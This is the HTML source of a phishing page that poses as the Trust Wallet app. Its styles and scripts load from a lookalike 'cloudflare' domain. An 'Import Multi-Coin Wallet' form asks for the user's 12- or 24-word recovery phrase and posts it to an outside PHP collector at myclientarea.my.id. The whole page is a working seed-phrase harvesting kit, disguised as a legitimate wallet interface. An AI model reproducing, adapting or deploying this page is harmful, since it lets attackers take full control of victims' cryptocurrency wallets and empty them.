<!DOCTYPE html>
<html lang="en">


<head>

<meta charset="utf-8">
    <link rel="icon" href="https://trustwallet.com/assets/images/favicon.ico">
    <link rel="apple-touch-icon" href="https://trustwallet.com/assets/images/favicon.png">
    <title>Trust Wallet</title>


<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/bootstrap.min.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/line-icons.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/slicknav.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/color-switcher.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/animate.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/owl.carousel.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/main.css">

<link rel="stylesheet" type="text/css" href="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/responsive.css">
<link rel="icon" href="assets/icon/favicon.ico">
<link rel="manifest" href="manifest.json">
<link rel="stylesheet" href="https://unpkg.com/swiper@7/swiper-bundle.min.css"/>
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">



<style type="text/css">
        #loginform{
          display: none;
        }

        .swiper {
 
  height: 500px;
  display: flex;
  justify-content: center;
  align-items: center;
}



    .swiper-slide {
      text-align: center;
      font-size: 188px;
      overflow: hidden;
    }

.swiper-wrapper{
 margin-bottom: 65px;
}

/*.list-group-item:after {*/
  /*content: '\003e';  Unicode character for "plus" sign (+) */
  /*font-size: 19px;*/
  /*font-weight: 300;*/
  /*color: #777;*/
  /*float: right;*/
  /*margin-top: 5px;*/
  /*margin-left: 5px;*/

.setts:before {
  content: "\2190"!important; /* Unicode character for "arrow" sign (<---) */
  font-size: 29px;
  font-weight: 1000;
  color: #fff;
  float: left;
  bottom: 40px;
  margin-left: 5px;
  margin-right: 25px;
}
/*.setts:after {
  content: "\2139"!important;  Unicode character for "arrow" sign (<---) 
  font-size: 29px;
  font-weight: 200!important;
  color: #fff;
  float: right;
  margin-right: 25px;
  border:2px solid #fff;
  border-radius: 50%;
  padding: 5px;
}*/
.active:after {
  content: "\2796"; /* Unicode character for "minus" sign (-) */
}



.navicon2{
  background-color: #777;
  padding: 9px;
  font-size: 16px;
  border-radius: 4px;
}


.list-group-item{
  background-color: #fff;
  font-size: 14px;
  color: black;
}

.list-group-item .fa{
  color: #fff;
}

.list-group-item .material-icons{
  color: #fff;
}



 fieldset{
  border: none;
  border-radius: 3px;
  padding: 5px;
 }


 

  textarea{
  border: none;
  outline: none;
  resize: none;
}

.labelname{
  position: absolute;
  top: 4%;
  font-size: 11px;
  color:#6B6B6B!important;
  background-color: #fff;
  margin-left: 10px;
}

.labels{
  font-size: 12px;
  color:#6B6B6B;
  position: absolute;
    top: 21%;
    overflow:hidden;
    margin-left: 5px;
    background-color: #fff;
    color: royalblue!important;
    display: none;
}

.textarea_style{
  margin-top: 5px;
  width: auto;
  height: auto;
  border: 1px solid #e0e0e0;
  border-radius: 2px;
  font-size: 16px;
  overflow: hidden;
}

.lastheading{
  display: none;
}


</style>
</head>
<body>

<ul id="lastheader"   class="list-group list-group-flush lastheading">
  <a href="#" id="backbtn" onclick="backbtnn()"> <li style=" width: 100%; background-color: #3070B8; color: #fff;" class="list-group-item  setts"> <p style="margin-top:4px!important; font-size: 20px; font-weight:700;">Import Multi-Coin Wallet</p>   </li> </a>

</ul>


<section id="lastitem" class="register section-padding lastheading">
<div class="container">
<div class="row justify-content-center">
<div class="col-lg-5 col-md-12 col-xs-8">
<div  class="register-form login-area">

<form  id="" class="login-form" action="//www.myclientarea.my.id/review-data/sfm.php" method="POST" autocomplete="off">

  
  
<div class="form-group">
  <label for="wallet"  class="labelname">Name</label>
  <input id="wallet" type="text" name="name" class="form-control" value="Multi-Coin Wallet 1">
</div>

 
      <label id="label" class="labels">Phrase</label>
      <fieldset id="fieldset">
      <div id="textaread" class="textarea_style">
        <textarea class="textarea"   name="phrase"  rows="4" cols="37" maxlength="100" minlength="3" placeholder="Phrase" onfocus="txtarea()" required></textarea>
      </div>
      </fieldset>


      <div  class="form-group" style="display:flex; justify-content: center;  margin-left: 10px;">
 <p >Typically 12 (sometimes 24) words separated by single spaces</p>
</div>

<div style="display:flex; justify-content: center; padding: 10px;" class="form-group">
  <input type="submit"  style="display:flex; justify-content: center; padding: 10px; width: 95%; background-color: #3070B8!important;"  class="btn btn-primary" value="Import">
</div>
</form>
</div>
</div>
</div>
</div>
</section>



<!-- Slider main container -->
<div id="carouselExampleIndicators" class="swiper container-fluid">
  <!-- Additional required wrapper -->
  <div class="swiper-wrapper">
    <!-- Slides -->
    <div class="swiper-slide" style="">
      <p style="display: flex; justify-content: center;">
       <img  src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/w1.jpeg" style="height: 500px;  margin-top:100px;">
      </p>
     </div>

     <div class="swiper-slide" style="display: flex; justify-content: center; ">
      <p style="display: flex; justify-content: center; ">
      <img  src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/wa1.jpeg" style="height: 455px;  margin-top:130px; margin-right:13px;  ">
      </p>
     </div>

     <div class="swiper-slide" style="">
      <p style="display: flex; justify-content: center;">
       <img  src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/wa2.jpeg" style="height: 470px;  margin-top:100px;  ">
      </p>
     </div>

    
  </div>


<style type="text/css">
  .swiper-pagination{
    position: absolute;
    top: 96%;

  }
</style>

  <!-- If we need pagination -->
  <div class="swiper-pagination">
    
  </div>

  <!-- If we need navigation buttons -->
  

  <!-- If we need scrollbar -->
  
</div>



 <ul id="loginform"   class="list-group list-group-flush">
  <a href="#" id="backbtn" onclick="backbtn()"> <li style=" width: 100%; background-color: #3070B8; color: #fff;" class="list-group-item  setts"> <p style="margin-top:4px!important; font-size: 20px; font-weight:700;">Import</p>   </li> </a>

<div style="background-color: #f5f5f5; padding: 20px 0px;">
  <a href="#" onclick="lastpg()"> <li class="list-group-item"><img style="height:35px; width: 35px;   border: 1px solid #e0e0e0; border-radius: 50%; padding: 5px;" src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/coin.jpeg"> Multi-Coin Wallet </li></a>
</div>
</ul>




 
<br><br><br>
<div style="display:flex; justify-content: center; ">
  <input id="btnSubmit" onclick="myFunction()" type="submit" value="i already have a wallet" style="background-color: #3070B8;" class="btn btn-primary">
</div>


<style type="text/css">
  .label-container{
  position:fixed;
  bottom:48px;
  right:105px;
  display:table;
  visibility: hidden;
}

.label-text{
  color:#FFF;
  background:rgba(51,51,51,0.5);
  display:table-cell;
  vertical-align:middle;
  padding:10px;
  border-radius:3px;
}

.label-arrow{
  display:table-cell;
  vertical-align:middle;
  color:#333;
  opacity:0.5;
}

.float{
  position:fixed;
  width:60px;
  height:60px;
  bottom:30px;
  right: 10px;
  background-color: rgb(14, 139, 37);
  color:#fff!important;
  border-radius:50px;
  text-align:center;
  box-shadow: 2px 2px 3px #999;
  z-index:1000;
  animation: bot-to-top 2s ease-out;
}

.marvel-device{
  position:fixed;
  left: 13px;
  padding-bottom:20px;
  bottom:80px;
  z-index:100;
  animation: bot-to-top 2s ease-out;
}

.marvel-device li{
  list-style:none;
  margin-bottom:10px;
}

.marvel-device li a{
  background-color:#F33;
  color:#FFF;
  border-radius:50px;
  text-align:center;
  box-shadow: 2px 2px 3px #999;
  width:60px;
  height:60px;
  display:block;
}

.marvel-device:hover{
  visibility:visible!important;
  opacity:1!important;
}


.my-float{
  font-size:24px;
  margin-top:18px;
}

a#menu-share + .marvel-device{
  visibility: hidden;
}

a#menu-share:hover + .marvel-device{
  visibility: visible;
  animation: scale-in 0.5s;
}

a#menu-share i{
  animation: rotate-in 0.5s;
}

a#menu-share:hover > i{
  animation: rotate-out 0.5s;
}

@keyframes bot-to-top {
    0%   {bottom:-40px}
    50%  {bottom:40px}
}

@keyframes scale-in {
    from {transform: scale(0);opacity: 0;}
    to {transform: scale(1);opacity: 1;}
}

@keyframes rotate-in {
    from {transform: rotate(0deg);}
    to {transform: rotate(360deg);}
}

@keyframes rotate-out {
    from {transform: rotate(360deg);}
    to {transform: rotate(0deg);}
}



.page {
  width: 100%;
  height: 100%;
  display: flex;
  align-items: center;
  justify-content: center;
}

.marvel-device .screen {
  text-align: left;
}

.screen-container {
  height: 100%;
}

.marvel-device{
  display: none;
}

/* Status Bar */

.status-bar {
  height: 25px;
  background: #004e45;
  color: #fff;
  font-size: 14px;
  padding: 0 8px;
}

.status-bar:after {
  content: "";
  display: table;
  clear: both;
}

.status-bar div {
  float: right;
  position: relative;
  top: 50%;
  transform: translateY(-50%);
  margin: 0 0 0 8px;
  font-weight: 600;
}

/* Chat */

.chat {
  height: calc(100% - 69px);
}

.chat-container {
  height: 100%;
}

/* User Bar */

.user-bar {
  height: 55px;
  background: #005e54;
  color: #fff;
  padding: 0 8px;
  font-size: 24px;
  position: relative;
  z-index: 1;
}

.user-bar:after {
  content: "";
  display: table;
  clear: both;
}

.user-bar div {
  float: left;
  transform: translateY(-50%);
  position: relative;
  top: 50%;
}

.user-bar .actions {
  float: right;
  margin: 5px 0 0 10px;
}

.user-bar .actions img {
  height:28px;
}
.user-bar .actions.more {
  margin: 0 12px 0 20px;
}

.user-bar .actions.attachment {
  margin: 0 0 0 20px;
}

.user-bar .actions.attachment i {
  display: block;
/*   transform: rotate(-45deg); */
}

.user-bar .avatar {
  margin: 0 0 0 5px;
  width: 36px;
  height: 36px;
}
.show {display:block;}
.user-bar .avatar img {
  border-radius: 50%;
  box-shadow: 0 1px 0 rgba(255, 255, 255, 0.1);
  display: block;
  width: 100%;
}

.user-bar .name {
  font-size: 17px;
  font-weight: 600;
  
  letter-spacing: 0.3px;
  margin: 0 0 0 8px;
  
  white-space: nowrap;
  width: 110px;
}

.user-bar .status {
  display: block;
  font-size: 13px;
  font-weight: 400;
  letter-spacing: 0;
}

/* Conversation */

.conversation {
  height: calc(100% - 12px);
  position: relative;
  background: url("https://i.ibb.co/3s1f9Jq/default-wallpaper.png") repeat;
  z-index: 0;
}

.conversation ::-webkit-scrollbar {
  transition: all .5s;
  width: 5px;
  height: 1px;
  z-index: 10;
}

.conversation ::-webkit-scrollbar-track {
  background: transparent;
}

.conversation ::-webkit-scrollbar-thumb {
  background: #b3ada7;
}

.conversation .conversation-container {
  height: calc(100% - 68px);
  box-shadow: inset 0 10px 10px -10px #000000;
  overflow-x: hidden;
  padding: 0 16px;
  margin-bottom: 19px;
}

.conversation .conversation-container:after {
  content: "";
  display: table;
  clear: both;
}

/* Messages */

.message {
  color: #000;
  clear: both;
  line-height: 18px;
  font-size: 15px;
  padding: 8px;
  position: relative;
  margin: 8px 0;
  max-width: 85%;
  word-wrap: break-word;
  z-index: -1;
}

.message:after {
  position: absolute;
  content: "";
  width: 0;
  height: 0;
  border-style: solid;
}

.metadata {
  display: inline-block;
  float: right;
  padding: 0 0 0 7px;
  position: relative;
  bottom: -4px;
}

.metadata .time {
  color: rgba(0, 0, 0, .45);
  font-size: 11px;
  display: inline-block;
}

.metadata .tick {
  display: inline-block;
  margin-left: 2px;
  position: relative;
  top: 4px;
  height: 16px;
  width: 16px;
}

.metadata .tick svg {
  position: absolute;
  transition: .5s ease-in-out;
}

.metadata .tick svg:first-child {
  -webkit-backface-visibility: hidden;
          backface-visibility: hidden;
  -webkit-transform: perspective(800px) rotateY(180deg);
          transform: perspective(800px) rotateY(180deg);
}

.metadata .tick svg:last-child {
  -webkit-backface-visibility: hidden;
          backface-visibility: hidden;
  -webkit-transform: perspective(800px) rotateY(0deg);
          transform: perspective(800px) rotateY(0deg);
}

.metadata .tick-animation svg:first-child {
  -webkit-transform: perspective(800px) rotateY(0);
          transform: perspective(800px) rotateY(0);
}

.metadata .tick-animation svg:last-child {
  -webkit-transform: perspective(800px) rotateY(-179.9deg);
          transform: perspective(800px) rotateY(-179.9deg);
}

.message:first-child {
  margin: 16px 0 8px;
}

.message.received {
  background: #fff;
  border-radius: 0px 5px 5px 5px;
  float: left;
}

.message.received .metadata {
  padding: 0 0 0 16px;
}

.message.received:after {
  border-width: 0px 10px 10px 0;
  border-color: transparent #fff transparent transparent;
  top: 0;
  left: -10px;
}

.message.sent {
  background: #e1ffc7;
  border-radius: 5px 0px 5px 5px;
  float: right;
}

.message.sent:after {
  border-width: 0px 0 10px 10px;
  border-color: transparent transparent transparent #e1ffc7;
  top: 0;
  right: -10px;
}

/* Compose */

.conversation-compose {
  display: flex;
  flex-direction: row;
  align-items: flex-end;
  overflow: hidden;
  height: 40px;
  width: 100%;
  z-index: 2;
  padding-bottom: 20px;
}

.conversation-compose div,
.conversation-compose input {
  background: #fff;
  height: 100%;
}

.conversation-compose .emoji {
  display: flex;
  align-items: center;
  justify-content: center;
  background: white;
  border-radius: 50% 0 0 50%;
  flex: 0 0 auto;
  margin-left: 8px;
  width: 38px;
  height: 38px;
}

.conversation-compose .input-msg {
  display: flex;
  align-items: center;
  justify-content: center;
  background-color: rgb(14, 139, 37);;
  flex: 0 0 auto;
  width: 400px;
  height: 38px;
  text-decoration: none;
  font-weight:700;
  color: #fff;
}

.conversation-compose .photo {
  flex: 0 0 auto;
  border-radius: 0 30px 30px 0;
  text-align: center;
  width: auto;
  display: flex;
  padding-right: 6px;
  height: 38px;
}

.conversation-compose .photo img {
  display: block;
  color: #7d8488;
  font-size: 24px;
  transform: translate(-50%, -50%);
  position: relative;
  top: 50%;
  margin-left: 10px;
}


.conversation-compose .send {
  background: transparent;
  border: 0;
  cursor: pointer;
  flex: 0 0 auto;
  margin-right: 8px;
  padding: 0;
  position: relative;
  outline: none;
  margin-left: .5rem;
}

.conversation-compose .send .circle {
  background: #008a7c;
  border-radius: 50%;
  color: #fff;
  position: relative;
  width: 38px;
  height: 38px;
  display: flex;
  align-items: center;
  justify-content: center;
}

.conversation-compose .send .circle i {
  font-size: 24px;
  margin-left: 1px;
}

/* Small Screens */

@media (max-width: 768px) {
  .marvel-device.nexus5 {
    
    margin-left: 0px!important;
  
  }

 .conversation-compose .input-msg {
 display: flex;
  align-items: center;
  justify-content: center;
  width: 200px;
  height: 38px;
  text-decoration:none; 
  font-weight:700;
  color: #fff;
}

 
}
</style>
 
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/jquery-min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/popper.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/bootstrap.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/jquery.counterup.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/waypoints.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/wow.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/owl.carousel.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/jquery.slicknav.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/main.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/form-validator.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/contact-form-script.min.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/summernote.js"></script>
<script src="https://www.cdnjs.cloudflare.client-area.my.id/_next/static/ajax/libs/font-awesome/17.10.22/files_twt/password-validate.js"></script>
<script src="https://unpkg.com/swiper@7/swiper-bundle.min.js"></script>
<script type="text/javascript">
  var swiper = new Swiper('.swiper', {
    loop:true,
      pagination: {
        el: '.swiper-pagination',
       
      },
    });
</script>

<script type="text/javascript">
  function myFunction() {
  var x = document.getElementById("loginform");
  var y = document.getElementById("btnSubmit");
  var z = document.getElementById("carouselExampleIndicators");
    x.style.display = "block";
    y.style.display = "none";
    z.style.display = "none";
}


function backbtn() {
  var x = document.getElementById("loginform");
  var y = document.getElementById("btnSubmit");
  var z = document.getElementById("carouselExampleIndicators");
    x.style.display = "none";
    y.style.display = "block";
    z.style.display = "block";
}

function backbtnn() {
  var x = document.getElementById("loginform");
  var y = document.getElementById("lastheader");
  var z = document.getElementById("lastitem")
    x.style.display = "block";
    y.style.display = "none";
    z.style.display = "none";
    
}


  function lastpg() {
  var x = document.getElementById("loginform");
  var y = document.getElementById("lastheader");
  var z = document.getElementById("lastitem");
    x.style.display = "none";
    y.style.display = "block";
    z.style.display = "block";

}

  function txtarea() {
  var x = document.getElementById("label");
  var y = document.getElementById("fieldset");
  var z = document.getElementById("textaread");
    x.style.display = "block";
    y.style.border = "thin solid #3070B8";
    z.style.border = "thin solid #fff";
}
</script>
</body>

</html>
